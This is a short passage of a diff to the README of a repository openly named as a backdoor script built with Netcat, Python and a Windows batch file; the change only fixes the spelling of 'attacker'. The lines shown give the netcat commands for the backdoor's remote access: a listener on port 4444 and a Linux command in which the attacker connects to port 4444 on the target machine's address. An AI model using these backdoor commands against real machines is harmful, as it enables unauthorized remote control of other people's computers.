ArnabMandal457/PETV83L-Arnab-Mandal-Backdoor-script-using-Netcat-Python-and-Windows-bat-file/README.md

    ```bash
    nc64 -lvp 4444
    ```
-- The command attacjer needs to run in their machines.
+- The command attacker needs to run in their machines.
   - For Linux
     ```bash
     nc <ip_address_of _the_target_machine> 4444